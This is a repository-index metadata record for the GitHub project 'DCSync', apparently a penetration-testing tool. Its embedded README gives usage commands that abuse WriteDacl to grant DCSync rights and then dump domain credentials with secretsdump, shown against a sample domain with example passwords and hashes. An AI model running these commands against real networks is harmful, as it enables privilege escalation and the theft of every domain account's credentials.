{"id":13845395,"url":"https://github.com/n00py/DCSync","last_synced_at":"2025-07-12T02:31:01.622Z","repository":{"id":40561415,"uuid":"449845823","full_name":"n00py/DCSync","owner":"n00py","description":"DCSync Attack from Outside using Impacket ","archived":false,"fork":false,"pushed_at":"2022-05-02T14:19:02.000Z","size":30,"stargazers_count":109,"open_issues_count":0,"forks_count":15,"subscribers_count":2,"default_branch":"main","last_synced_at":"2024-10-19T19:43:42.017Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"https://www.n00py.io/2022/01/adding-dcsync-permissions-from-linux/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/n00py.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2022-01-19T20:31:03.000Z","updated_at":"2024-08-12T20:19:53.000Z","dependencies_parsed_at":"2022-08-09T23:10:49.252Z","dependency_job_id":null,"html_url":"https://github.com/n00py/DCSync","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n00py%2FDCSync","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n00py%2FDCSync/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n00py%2FDCSync/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n00py%2FDCSync/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/n00py","download_url":"https://codeload.github.com/n00py/DCSync/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225784456,"owners_count":17523652,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:03:22.689Z","updated_at":"2024-11-21T18:31:26.873Z","avatar_url":"https://github.com/n00py.png","language":"Python","funding_links":[],"categories":["Python"],"sub_categories":[],"readme":"# Adding DCSync Permissions\nMostly copypasta from https://github.com/tothi/rbcd-attack\n```\nusage: DCSync.py [-h] -dc FQDN -t USERNAME [-hashes LMHASH:NTHASH] [-k] identity\n\nWriteDacl Attack: To abuse WriteDacl to a domain object, you may grant yourself the DcSync privileges.\n\npositional arguments:\n  identity              domain\\username:password, attacker account with write access to target computer properties (NetBIOS domain name must be used!)\n\noptions:\n  -h, --help            show this help message and exit\n  -dc FQDN              FQDN of the Domain Controller\n  -t USERNAME           Target user to be escalated in format *Distinguished Names*\n  -hashes LMHASH:NTHASH\n                        Hash for LDAP auth (instead of password)\n  -k                    If you want to use a Kerberos ticket\n\n Examples:\n     DCSync.py -dc dc01.n00py.local -t 'CN=n00py,OU=Employees,DC=n00py,DC=local'  n00py\\Administrator:Password123\n     DCSync.py -dc dc01.n00py.local -t 'CN=n00py,OU=Employees,DC=n00py,DC=local'  n00py\\Administrator -k\n     DCSync.py -dc dc01.n00py.local -t 'CN=spoNge369,CN=Users,DC=n00py,DC=local' 'n00py.local\\user_with_writeDACL:P@$$w0rd123'\n     DCSync.py -dc dc01.n00py.local -t 'CN=spoNge369,CN=Users,DC=n00py,DC=local' 'n00py.local\\user_with_writeDACL' -hashes :32693b11e6aa90eb43d32c72a07ceea6\n\n DCSync Attack:\n     secretsdump.py 'n00py.local/spoNge369:passw0rd123!@dc01.n00py.local'\n\n Search Distinguished Names(DN) of spoNge369:\n     pywerview get-netuser -u'any_valid_user' -p'password321$' -t dc01.n00py.local | perl -wnlE'print if/distinguishedname.+spoNge369/'\n  \n```\n\nTo clean up after you are done, use ACLpwn https://github.com/fox-it/aclpwn.py. This tool is pretty old and not maintained, but you can get it to work. One thing you will need to do is replace “neo4j.v1” with just “neo4j” in database.py. To restore the ACLs to the original configuration, use the restore state file created by the DCSync tool.\n\n\n\n\n## Dependencies:\n\nImpacket \u003cbr\u003e\n`pip3 install pywerview`\n\nFor kerberos:\n```\napt install heimdal-dev -y\napt install libkrb5-dev -y\npython3 -m pip install gssapi\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fn00py%2FDCSync","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fn00py%2FDCSync","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fn00py%2FDCSync/lists"}